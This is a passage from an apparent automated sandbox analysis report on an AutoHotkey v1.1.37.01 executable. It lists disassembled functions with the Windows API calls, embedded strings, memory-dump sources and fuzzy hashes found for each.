                                      • Opcode Fuzzy Hash: a80b8a16876ac66192cf3dac2d8b96d2bb992ab6ce74570da517a0fc32917bef
                                      • Instruction Fuzzy Hash: 61714731A403115BEB30AE148C42BAF73A5DB80755F05492EFD45AB381EFACED45879A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00446000 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 222COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • The maximum number of InputBoxes has been reached., xrefs: 00446037
                                      • AutoHotkey v1.1.37.01, xrefs: 0044606F, 00446079
                                      • The InputBox window could not be displayed., xrefs: 004462F2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: _wcsncpy
                                      • String ID: AutoHotkey v1.1.37.01$The InputBox window could not be displayed.$The maximum number of InputBoxes has been reached.
                                      • API String ID: 1735881322-1416150321
                                      • Opcode ID: cc6785e0fe593b75fa64882d3bc6e65ba3c5c5ca2db854e94e6bbc2f43e0679d
                                      • Instruction ID: 24c5464e0b8b2676bd3b82f55efb01de924ad5d1b93625a8cd9471f9277c77f3
                                      • Opcode Fuzzy Hash: cc6785e0fe593b75fa64882d3bc6e65ba3c5c5ca2db854e94e6bbc2f43e0679d
                                      • Instruction Fuzzy Hash: F7817970604380ABE320EF14EC41BAB77E4FB46704F14497FE9858B295EB7A9805C79E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042754D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 162COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll__wcsnicmp
                                      • String ID: Fast$Float$Integer$Parameter #1 invalid.$Parameter #2 invalid.
                                      • API String ID: 28402859-2639214213
                                      • Opcode ID: b72e62aa2592e3512aa05990c33610789e3ca5cdb8d7ed5b43b95686997d2127
                                      • Instruction ID: b876748a681c5d0ec0c40d26754318785c8a96c57af8143fab573977090a1c22
                                      • Opcode Fuzzy Hash: b72e62aa2592e3512aa05990c33610789e3ca5cdb8d7ed5b43b95686997d2127
                                      • Instruction Fuzzy Hash: FD5124347083509BEB20EB1AE8457A777D1AB81318F88486FE84587392D77EDC85C76A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045C180 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 130networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 0045C1CE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Startup
                                      • String ID: 0.0.0.0$OU@
                                      • API String ID: 724789610-30808738
                                      • Opcode ID: 0513f2d42c1c2ff81724a1c5d5dcdb284dab01ea96c6fd1f092c2688e9e3eb38
                                      • Instruction ID: 53d746e6a5f46c120fcc11010fda971408548fc268c01bea4df215fed3ec5b8c
                                      • Opcode Fuzzy Hash: 0513f2d42c1c2ff81724a1c5d5dcdb284dab01ea96c6fd1f092c2688e9e3eb38
                                      • Instruction Fuzzy Hash: 1C41AF75A043418FC720DF58D8857ABB7A8FF85715F04496AEC4AC7341EB78D808CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004690B0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 101windowregistryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 004690D5
                                      • LoadCursorW.USER32 ref: 00469121
                                      • RegisterClassExW.USER32(00000000), ref: 00469140
                                      • CreateWindowExW.USER32(?,AutoHotkeyGUI,02C40164,?,00000000,00000000,00000000,00000000,?,00000000,00400000,00000000), ref: 004691B1
                                      • SendMessageW.USER32(00000000,00000080,00000000,000B018F), ref: 004691F1
                                      • SendMessageW.USER32(?,00000080,00000001,0007044D), ref: 004691FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClassCreateCursorLoadRegisterWindow_memset
                                      • String ID: 0$AutoHotkeyGUI$RegClass
                                      • API String ID: 937852688-2319214661
                                      • Opcode ID: 970f3dd5e4d1ffb96c88e49bafb497a1adfa6030b6578ec29b8dcf055a7cb787
                                      • Instruction ID: 107bb90762503ba579da4be20218167b4c656a2392895ccd380e5ba653ba64ab
                                      • Opcode Fuzzy Hash: 970f3dd5e4d1ffb96c88e49bafb497a1adfa6030b6578ec29b8dcf055a7cb787
                                      • Instruction Fuzzy Hash: 56315274A45301AFE320DF54DC49B577BE8BB84704F20492EF58997290E7B8B808CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00461590 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __swprintf.LIBCMT ref: 004615EE
                                      • FormatMessageW.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000,004B0CF8), ref: 00461611
                                      • _vswprintf_s.LIBCMT ref: 00461656
                                      • SysFreeString.OLEAUT32(?), ref: 00461686
                                      • SysFreeString.OLEAUT32(00000000), ref: 0046168C
                                      • SysFreeString.OLEAUT32(?), ref: 00461692
                                      Strings
                                      • 0x%08X - , xrefs: 004615E8
                                      • No valid COM object!, xrefs: 004615DC
                                      • Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d, xrefs: 0046164D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FreeString$FormatMessage__swprintf_vswprintf_s
                                      • String ID: Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d$0x%08X - $No valid COM object!
                                      • API String ID: 380084984-3028990165
                                      • Opcode ID: 6bfd10bf37f325b25f4ecd42ffea40515b7e927b69f451191dc847ab580ceb39
                                      • Instruction ID: ad5d430ca7fe3a9954f1f11dc84a543af2ef8e8c4e5c14ce4c1036dea1ded98c
                                      • Opcode Fuzzy Hash: 6bfd10bf37f325b25f4ecd42ffea40515b7e927b69f451191dc847ab580ceb39
                                      • Instruction Fuzzy Hash: 6331FB75A003005BDB14EF69DC84F6777ACEFC4704F48847EA90697295E678D904C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D360 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: UTF-16$UTF-16-RAW$UTF-8$UTF-8-RAW
                                      • API String ID: 3832890014-2787617770
                                      • Opcode ID: 7f9431599b7a0798196ad7723fce95dc4281cfc4a5e1af8735998d088537d5ca
                                      • Instruction ID: dbad965653c36215f019ce76df4695aaffef70768a14fbef120b4b557ddf5e53
                                      • Opcode Fuzzy Hash: 7f9431599b7a0798196ad7723fce95dc4281cfc4a5e1af8735998d088537d5ca
                                      • Instruction Fuzzy Hash: B10171A6E4562122EE31312E3D02BDB11890B1032AF1A453BFD08D5386F69EDDD280EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0046B2F6 Relevance: 15.1, APIs: 10, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000030,?,?), ref: 0046B326
                                      • GetDC.USER32(?), ref: 0046B34F
                                      • SelectObject.GDI32(00000000,?), ref: 0046B371
                                      • GetTextMetricsW.GDI32(00000000,?), ref: 0046B388
                                      • SendMessageW.USER32(?,00001033,00000000,00000000), ref: 0046B3A9
                                      • GetSystemMetrics.USER32(0000000C), ref: 0046B3FF
                                      • GetSystemMetrics.USER32(00000032), ref: 0046B42F
                                      • SendMessageW.USER32(?,00001033,00000000,00000000), ref: 0046B476
                                      • SendMessageW.USER32(?,00001040,?,000000FF), ref: 0046B4CD
                                      • MoveWindow.USER32(?,?,?,?,-00000004,00000001,?,00001040,?,000000FF), ref: 0046B4FB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Metrics$System$MoveObjectSelectTextWindow
                                      • String ID:
                                      • API String ID: 591662205-0
                                      • Opcode ID: b8bf1e71b193b7eb715cfa83d37aa3fcdbc239687f9a8bea5a3e72a26b515778
                                      • Instruction ID: 74283ab492f7402da41981ba02734e2d8bbf43aa106044db3df538d8db25955c
                                      • Opcode Fuzzy Hash: b8bf1e71b193b7eb715cfa83d37aa3fcdbc239687f9a8bea5a3e72a26b515778
                                      • Instruction Fuzzy Hash: 84515975608340EFD7649F21C848B6BBBE4FFC9304F108A1EF98A9A291E774D951CB46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004805D0 Relevance: 15.1, APIs: 10, Instructions: 126COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerW.USER32(?,?,?,?,?,?,00000000,00000000,00000000,?,?,00424020,?,004B2BA8,004B2BA0,00000001), ref: 004805E7
                                      • CharUpperW.USER32(?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 00480602
                                      • CharLowerW.USER32(?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 0048062E
                                      • CharUpperW.USER32(?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 00480643
                                      • CharLowerW.USER32(?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 0048067D
                                      • CharLowerW.USER32(00000000,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 0048068A
                                      • CharLowerW.USER32(?,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806A4
                                      • CharLowerW.USER32(?,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806B2
                                      • CharLowerW.USER32(?,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806CE
                                      • CharLowerW.USER32(00000000,?,?,?,?,?,00424020,?,004B2BA8,004B2BA0,00000001,00000001,000000FF,00000000), ref: 004806DB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Char$Lower$Upper
                                      • String ID:
                                      • API String ID: 3371602591-0
                                      • Opcode ID: 808d362ca0f029c8115cb50b0b1b1874d45a661e1dd4bb1ec9ad759b0530762f
                                      • Instruction ID: 54831a4cd5308765c67d618c88d3818f5d73c1392bbbd60089cb17560e0405c3
                                      • Opcode Fuzzy Hash: 808d362ca0f029c8115cb50b0b1b1874d45a661e1dd4bb1ec9ad759b0530762f
                                      • Instruction Fuzzy Hash: AB418E25910335AB9BA46F16988013FBBE4AE84711B450C2BFC86D6380E63CEC58DB79
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00473760 Relevance: 15.1, APIs: 10, Instructions: 111windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000407,00000000,?), ref: 00473781
                                      • SendMessageW.USER32(00000000,00000408,00000001,?), ref: 00473791
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004737D9
                                      • SendMessageW.USER32(?,00000408,00000001,00000000), ref: 004737E6
                                      • SendMessageW.USER32(?,00000417,00000000,00000000), ref: 004737FA
                                      • SendMessageW.USER32(?,00000415,00000000,?), ref: 0047380E
                                      • SendMessageW.USER32(?,0000041B,00000001,00000000), ref: 00473822
                                      • SendMessageW.USER32(?,0000041F,?,00000000), ref: 00473837
                                      • SendMessageW.USER32(?,00000420,00000001,?), ref: 0047384D
                                      • SendMessageW.USER32(?,00000420,00000000), ref: 00473863
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 93ca42cf9be7416e5d13317c91d165c3028f1e774b7623147ced0c71374b0e21
                                      • Instruction ID: 063a8af5e9ae07027dfb1cf5677e85290380858b74c9b649f7e4b070b1532055
                                      • Opcode Fuzzy Hash: 93ca42cf9be7416e5d13317c91d165c3028f1e774b7623147ced0c71374b0e21
                                      • Instruction Fuzzy Hash: 6F3100F03403047AE724DE69CC82F66B7DD9F84B00F15845ABB44EF2D5C6B5E8819B28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00453580 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 316COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(004D85F4,00000000,?,00000000), ref: 004535A7
                                      • LeaveCriticalSection.KERNEL32(004D85F4), ref: 0045370C
                                      • LeaveCriticalSection.KERNEL32(004D85F4), ref: 004538BF
                                      • _free.LIBCMT ref: 0045390A
                                      • __wcsdup.LIBCMT ref: 00453934
                                      • LeaveCriticalSection.KERNEL32(004D85F4), ref: 00453977
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Leave$Enter__wcsdup_free
                                      • String ID: 0$Compile error %d at offset %d: %hs
                                      • API String ID: 2407865940-2351679343
                                      • Opcode ID: 78a67d05cb4629b95cfb42f76842a0a803c229eaa4788ee90d26f804805081c2
                                      • Instruction ID: a615273f3e704f5f51a10ee7c035ab95f179db104d3c17e6a6e1e288e6b3a1e4
                                      • Opcode Fuzzy Hash: 78a67d05cb4629b95cfb42f76842a0a803c229eaa4788ee90d26f804805081c2
                                      • Instruction Fuzzy Hash: 24C1C1B1A04201DBC710DF14D840B6677E0FF48797F144A6FE85687392E778EA49CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043A620 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 204COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Extra$File$Line$Message$The current thread will exit.$This DllCall requires a prior VarSetCapacity.$__Delete will now return.
                                      • API String ID: 3832890014-2095053968
                                      • Opcode ID: 93b2e31166dd7de60f299133917a67459624c79eeb204a911618123d4489fa83
                                      • Instruction ID: f1fc49799b7d9e73a8e7bf30246a7dd7ae7d34c5dd16a010838df674988f0624
                                      • Opcode Fuzzy Hash: 93b2e31166dd7de60f299133917a67459624c79eeb204a911618123d4489fa83
                                      • Instruction Fuzzy Hash: 7161D2706842009BD714EB159841B9A73E0AB88714F18492FFAC4AB391D77CED568B9F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040305D Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 170windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00403B80: _free.LIBCMT ref: 00403BB4
                                        • Part of subcall function 00403B80: _free.LIBCMT ref: 00403BEA
                                        • Part of subcall function 00403B80: _free.LIBCMT ref: 00403C0D
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetFocus.USER32 ref: 004016D4
                                      • TranslateAcceleratorW.USER32(00000000,?,?), ref: 0040171A
                                        • Part of subcall function 004033B0: GetTickCount.KERNEL32 ref: 004033B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick_free$AcceleratorFocusMessageTranslate
                                      • String ID: 6Dd$InputHook$8&
                                      • API String ID: 3994156647-1183632411
                                      • Opcode ID: 689718d5309f8e41934484b7ebdf205f7e3b217cc10e08894611bf51fe10f97f
                                      • Instruction ID: 6fe7db36cc520db0f671e2dccaa34a409d2b206318fb22a935eeeca121d0f828
                                      • Opcode Fuzzy Hash: 689718d5309f8e41934484b7ebdf205f7e3b217cc10e08894611bf51fe10f97f
                                      • Instruction Fuzzy Hash: 1951C0716083009BDB24DB28C884BAFB7E4AB85304F04493FE589A73E1D779ED45C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F860 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountForegroundTickWindow
                                      • String ID: 0
                                      • API String ID: 1022652907-4108050209
                                      • Opcode ID: afab0e26f32e06c0346b2b43f511d089b8248e405038778ff477383ac243d0fc
                                      • Instruction ID: d91f49cada566ccf2a15c6802b4066e396848445dfdae21dbddbd09072d9d01d
                                      • Opcode Fuzzy Hash: afab0e26f32e06c0346b2b43f511d089b8248e405038778ff477383ac243d0fc
                                      • Instruction Fuzzy Hash: 0441B172A012089BE710EF29EC44766B7E5EF89364F15053BED08C73A0E7359808CBDA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C7A0 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Eject$Label$Lock$Unlock
                                      • API String ID: 3832890014-1359929989
                                      • Opcode ID: ea537f0dd924644c6813cef5269b3358f2e461a6201835d6068bb2f81b85e7e1
                                      • Instruction ID: 592af338825407eb0ec1e2f89942e5897679865235ed718277a9bf49b75ee536
                                      • Opcode Fuzzy Hash: ea537f0dd924644c6813cef5269b3358f2e461a6201835d6068bb2f81b85e7e1
                                      • Instruction Fuzzy Hash: 10F0A769AC1A2221DF1130395E837DB24951B11B0BF98053BF810D52C1F38DCE84C0AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D130 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsicmp_l
                                      • String ID: Client$Relative$Screen$Window
                                      • API String ID: 3172861507-2312238187
                                      • Opcode ID: 710a49eb2f414cd602a6f57de5661da8268c9d34763459bd593c8395dd25ce68
                                      • Instruction ID: a11319dfc4586e9051bcbed5d18135407d9c1c6487c9e7a6259036669afcba54
                                      • Opcode Fuzzy Hash: 710a49eb2f414cd602a6f57de5661da8268c9d34763459bd593c8395dd25ce68
